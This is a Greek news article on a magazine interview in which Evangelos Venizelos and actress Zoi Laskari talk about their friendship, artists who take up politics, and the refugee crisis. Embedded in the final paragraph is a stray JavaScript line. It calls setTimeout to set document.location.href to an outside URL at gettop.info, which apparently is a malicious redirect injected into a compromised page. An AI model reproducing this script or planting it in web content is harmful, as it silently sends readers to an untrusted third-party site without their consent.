Ο Ευάγγελος Βενιζέλος «τα λέει» με τη φίλη του Ζωή Λάσκαρη

0
11

 

Ο Ευάγγελος Βενιζέλος είχε την ευκαιρία να συναντήσει τη δημοφιλή ηθοποιό, Ζωή Λάσκαρη με την οποία τον συνδέει μακροχρόνια φιλία και να συζητήσουν για πολιτική και προσφυγικό.

Η… απρόβλεπτη αυτή συνάντηση του πρώην προέδρου του ΠΑΣΟΚ και την αγαπημένης ηθοποιού έγινε μέσα στις σελίδες του περιοδικού BHMAgazino.

«Με τον Βαγγέλη είμαι πολλά χρόνια φίλη, από την εποχή που δούλευα στο Κρατικό Θέατρο Βορείου Ελλάδος, ή και από πιο πριν ακόμη. Τον Βαγγέλη τον αγαπώ, τον εκτιμώ, θεωρώ το μυαλό του σπουδαίο, όπως τον θεωρώ και πολύ φίλο. Ξέρω ότι σε μια δύσκολη στιγμή θα μου σταθεί», ανέφερε η κ. Λάσκαρη στο ΒΗΜΑgazino. «Οταν γνωριστήκαμε, εδώ και πολλά χρόνια, με τη Ζωή, νιώσαμε μια πολύ μεγάλη οικειότητα, ίσως επειδή διαθέτουμε έναν κοινό παρονομαστή. Και ο κοινός παρονομαστής είναι το ρίσκο και η δημόσια δράση. Γιατί αυτά ενώνουν τον καλλιτέχνη με τον πολιτικό», συμπλήρωσε ο κ. Βενιζέλος.

Η κα Λάσκαρη και ο κ. Βενιζέλος, αναφέρθηκαν και σε ένα πολύ συχνό φαινόμενο – τους καλλιτέχνες που ασχολούνται με την πολιτική. Η κa Λάσκαρη, τόνισε ότι πολλοί καλλιτέχνες αποφασίζουν να ασχοληθούν με τα κοινά, «γιατί θεωρούν ότι τοποθετώντας μία ταμπέλα στον εαυτό τους θα βρίσκουν πολύ ευκολότερα δουλειά και επιπλέον θα τους αντιμετωπίζουν κατά κάποιον τρόπο και ως πρότυπα. Οι περισσότεροι καλλιτέχνες σε σχέση με αυτούς που γνωρίζουμε ασχολούνται με την πολιτική γιατί αυτό τους εξυπηρετεί», σχολίασε η κα Λάσκαρη.

venizelos-laskari

Από την πλευρά του, ο πρώην πρόεδρος του ΠΑΣΟΚ χαρακτήρισε «πολιτική πράξη» το θέατρο και τον κινηματογράφο διαφοροποιώντας όμως την κομματική ενασχόληση «ή τη δήλωση ότι ανήκω και εγώ κάπου μαζί με την πλατιά μάζα, ώστε να γίνομαι συμπαθής επειδή είμαι του συρμού».

Τον κ. Βενιζέλο και την κα Λάσκαρη απασχόλησε και η προσφυγική κρίση στη συνέντευξη τους. Η κα Λάσκαρη, υποστήριξε ότι είναι πολύ δύσκολο να ενσωματωθούν οι πρόσφυγες «με μια άλλη κουλτούρα και μια άλλη θρησκεία» στους ρυθμούς ζωής της ΕΕ, λέγοντας: «Δεν μπορεί ο Ευρωπαίος να τακιμιάσει με την Ανατολή. Άρα πού πάμε; Τους συμπονάς όλους αυτούς τους ανθρώπους, δεν θέλεις να πνίγονται, αλλά ταυτόχρονα παρουσιάζεσαι ανίσχυρος να κάνεις οτιδήποτε».

«Είναι ένα ζήτημα που δεν μπορεί να το αντιμετωπίσει όχι η Ελλάδα, δεν μπορεί να το αντιμετωπίσει ούτε η Ευρωπαϊκή Ένωση. Και φυσικά δείχνει την πολιτική ανυπαρξία όχι μόνο της Ευρώπης, αλλά και τους διεθνούς συστήματος, των διεθνών θεσμών», σχολίασε ο κ. Βενιζέλος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here